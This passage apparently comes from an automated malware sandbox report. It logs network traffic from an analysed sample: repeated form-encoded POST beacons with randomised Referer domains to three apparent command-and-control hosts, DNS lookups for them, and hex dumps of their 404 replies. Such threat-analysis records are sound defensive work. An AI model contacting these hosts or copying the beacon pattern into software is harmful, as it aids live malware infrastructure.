                Source: Joe Sandbox ViewIP Address: 194.85.61.76 194.85.61.76
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ferxsaaokurf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://styqcrwcosyf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsprrtqwfiiffy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mitmeuexacjewbqk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dfnihlnejuw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://artooybeyrmney.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sjfvofnibfsk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dyokvtiefurhr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtrdqlyaxcnu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://weaudxshysghyed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rmlqaewyesef.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipahuxcmqng.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yebogyjrnkttg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbqncgggetrc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjvjeavryrj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jisidxjkipgcbgc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uloowasjyvbxjte.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jghirgxdfdtfej.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aemrvdevcrdbnu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://caegqqrnvwyec.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnjdvgwpgdpin.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://randrxuiexkkd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://egkbqdynffoi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkpvubjbjugu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pekwfbrjnpwbirs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rllvcebkwfymagl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylfiqfbsvxsdiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ggphwqihuaca.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbcjwexjjibiqt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tjeuikagddjvc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yylbqgigqdkmsn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufirisacqvk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipingdnctvhe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvohygrorigngv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iqmcbtituxk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rfcnfamftxutm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukacgtlptxyqmcdq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://daxnrqammsrat.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dsjauwmdkccdd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tupclykpsytewcxu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://livftrpgdgydc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drjnlhtrahircg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lhhcirujvotn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unomwhjdoaagckk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drmwwxjjhona.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqxnkwoysqpv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://swhsbooovvrt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://odsnbdoswem.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrdgusgumlecx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljmtvjfukirthh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vlctchybxmsfmihs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sgmoymnkvjycr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nnfjblhdxniepv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gwxdktlpqqov.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygdgxkxjwyg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqrqvcheqmo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fkdpjansght.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://viejsmtmgdxamty.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://quegfhrneryhjosy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldbqkqcjtqgsavin.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mmxcodigejxhlx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: constractionscity1991.lat
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: constractionscity1991.lat
                Source: global trafficDNS traffic detected: DNS query: restructurisationservice.ru
                Source: global trafficDNS traffic detected: DNS query: connecticutproperty.ru
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ferxsaaokurf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:58:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:58:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 